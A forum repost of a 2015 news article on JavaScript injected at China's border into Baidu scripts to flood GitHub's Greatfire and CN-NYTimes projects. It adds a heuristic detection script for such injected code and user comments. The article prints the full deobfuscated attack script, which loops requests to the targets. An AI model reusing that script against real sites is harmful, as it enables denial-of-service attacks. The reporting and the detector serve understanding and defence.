[News] The injected JavaScript used to smash

Author: shyangs (厚呦)   2015-03-29 20:22:43
1. Media source: The Register
2. Full news headline:
The injected JavaScript used to smash anti-Great Firewall of China GitHub
projects offline
Malicious JavaScript from Baidu is being used to attack GitHub
3. Full news text:
GitHub's servers are being hammered by web traffic from an army of unwitting
cyber-foot-soldiers.
It appears when thousands of people visit websites that serve ads and
tracking code from Baidu – China's answer to Google – from outside the
Middle Kingdom, network gateways on the Chinese border silently inject a
JavaScript function into those websites' pages.
This simple code instructs browsers to stealthily connect to GitHub.com every
two seconds, creating "an extremely large amount of traffic," the San
Francisco-based upstart said.
The JS specifically targets two GitHub-hosted projects – Greatfire and
CN-NYTimes – which help Chinese citizens circumvent The Great Firewall Of
China. The firewall blocks things like VPNs and censors web traffic, hiding
information on the Tiananmen Square massacre and so on.
GitHub said on Friday that the bursts in traffic, effectively a string of
distributed denial-of-service attacks, are causing intermittent outages.
"We're aware that GitHub.com is intermittently unavailable for some users
during the ongoing DDoS," GitHub said in a status update at 1549 UTC today.
"Restoring service for all users while deflecting attack traffic is our
number one priority. We've deployed our volumetric attack defenses against an
extremely large amount of traffic. Performance is stabilizing."
Hours earlier, the biz noted: "We've been under continuous DDoS attack for
24+ hours. The attack is evolving, and we're all hands on deck mitigating."
According to a security researcher at Insight Labs, HTTP requests to
hm.baidu.com/h.js are being hijacked by China's border gateways, which insert
some semi-obfuscated JavaScript to attack the aforementioned GitHub
repositories. The injected script looks like this, once unscrambled:
document.write("<script src=" +
    "'http://libs.baidu.com/jquery/2.0.0/jquery.min.js'" +
    ">\x3c/script>");
!window.jQuery && document.write(
    "<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;
function unixtime() {
    var a = new Date;
    return ( Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(),
        a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3 )
}
url_array = ["https://github.com/greatfire/",
    "https://github.com/cn-nytimes/"];
NUM = url_array.length;
function r_send2() {
    var a = unixtime() % NUM;
    get(url_array[a])
}
function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);
            3E5 > responseTime - startime && (r_send(b), count += 1)
        }
    })
}
function r_send(a) {
    setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);
The Greatfire project provides links to cloud-hosted mirrors of websites –
such as the BBC and Google's Blogger – that Chinese people can use to dodge
the Great Firewall. While BBC.com is blocked, a cache of the broadcaster's
pages on cloudfront.net is not, it seems. CN-NYTimes similarly mirrors the
New York Times.
"A certain device at the border of China's inner network and the Internet has
hijacked the HTTP connections went into China, replaced some javascript files
from Baidu with malicious ones that would load [the GitHub pages] every two
seconds," Insight Labs' Anthr@x wrote.
"In other words, even people outside China are being weaponized to target
things the Chinese government does not like, for example, freedom of speech."
While there is no proof that the Chinese government was directly involved in
the assault, other researchers, such as F-Secure's Mikko Hypponen, noted that
someone, state or otherwise, wants these projects silenced.
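Malicious JavaScript from Baidu has been found hijacking the traffic of unwitting users to DDoS GitHub.
This malicious script instructs browsers to connect to GitHub.com once every two seconds, bringing GitHub a huge amount of traffic.
The script targets two projects on GitHub, Greatfire and CN-NYTimes.
GitHub said the traffic bursts produced by the DDoS are making some services intermittently unavailable.
There is currently no direct evidence that the Chinese government was directly involved in this attack.
4. Full news link (or short URL): http://tinyurl.com/pydfc5f
5. Remarks: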
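An added example, not part of the original article or post: a heuristic check a site operator could run on the body returned for a third-party script URL, flagging the traits visible in the injected script listed above (hosts outside an expected set, timers re-armed through a string argument, `$.ajax` with `dataType: "script"`). The allow-list, the function names and the benign sample are assumptions made for illustration.

```javascript
// Added example: heuristic triage of a third-party script body.
// EXPECTED_HOSTS, the function names and BENIGN_SAMPLE are assumptions.

// Hosts this operator expects the Baidu analytics script to reference (assumed).
const EXPECTED_HOSTS = new Set(["hm.baidu.com", "libs.baidu.com", "code.jquery.com"]);

// Collect the hostname of every absolute http(s) URL found in the script text.
function referencedHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/[^\s"'<>)\\]+/g)) {
    try {
      hosts.add(new URL(m[0]).hostname.toLowerCase());
    } catch (_) {
      // Not a parseable URL; ignore it.
    }
  }
  return hosts;
}

// Flag the traits visible in the listing: off-list hosts, timers re-armed
// through a string argument, and $.ajax fetching a URL as a script.
function triageScript(source, expectedHosts = EXPECTED_HOSTS) {
  const unexpected = [...referencedHosts(source)]
    .filter((h) => !expectedHosts.has(h))
    .sort();
  const findings = [];
  if (unexpected.length > 0) findings.push("unexpected-host");
  if (/set(?:Timeout|Interval)\s*\(\s*["']/.test(source)) findings.push("string-timer");
  if (/\$\.ajax\s*\(/.test(source) && /dataType\s*:\s*["']script["']/.test(source)) {
    findings.push("ajax-as-script");
  }
  // Require an off-list host plus at least one request-loop trait.
  return { unexpected, findings, suspicious: unexpected.length > 0 && findings.length >= 2 };
}

// Abridged from the listing in the post above.
const INJECTED_SAMPLE = [
  'url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];',
  'function get(a) { $.ajax({ url: a, dataType: "script", timeout: 1E4, cache: !0 }) }',
  'setTimeout("r_send2()", 2E3);',
].join("\n");

// Constructed benign sample: a tracking beacon that stays on the expected host.
const BENIGN_SAMPLE = 'var i = new Image(); i.src = "http://hm.baidu.com/hm.gif?si=PLACEHOLDER";';

console.log(triageScript(INJECTED_SAMPLE));
console.log(triageScript(BENIGN_SAMPLE));
```

The check is pattern-based, so it only catches a body that still shows these traits in clear text; serving the script over HTTPS is what removes the on-path rewrite the article describes.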
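Author: ppttcc (ppttcc5566)   2015-03-29 20:23:00
The injected javascript is used to smash up the Great Wall's China
Author: abc21086999 (呵呵)   2015-03-29 20:24:00
UK government: Huawei is trustworthy
Author: loa123 (撕裂地中海)   2015-03-29 20:24:00
may show gan mo
Author: zipizza ( )   2015-03-29 20:24:00
The motherland's "goodwill"
Author: deicide218 (軟軟)   2015-03-29 20:25:00
So nasty, it only makes users outside the country do the attacking XDDDDDDDDDDDDDD
Author: L0v35 (是零不是歐)   2015-03-29 20:27:00
Pretty fierce. This basically can't be caught
Author: TKSHADE (雨怎麼下不停)   2015-03-29 20:27:00
The motherland's great firewall....
Author: web946719 (韋伯就是漏氣依舊)   2015-03-29 20:28:00
Quick, upvote, or else people will think we can't understand it
Author: silentence (小飛號:號:)   2015-03-29 20:31:00
Can't understand it. END
Author: netsphere (Ruby&Waku)   2015-03-29 20:32:00
Visit Baidu and get javascript code for free
Author: HamalAri (哈馬‧阿里)   2015-03-29 20:35:00
It's not the first time. Before this they also played with BT tracker DNS spoofing. This is who knows which, the Nth kind of GFW DDoS attack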
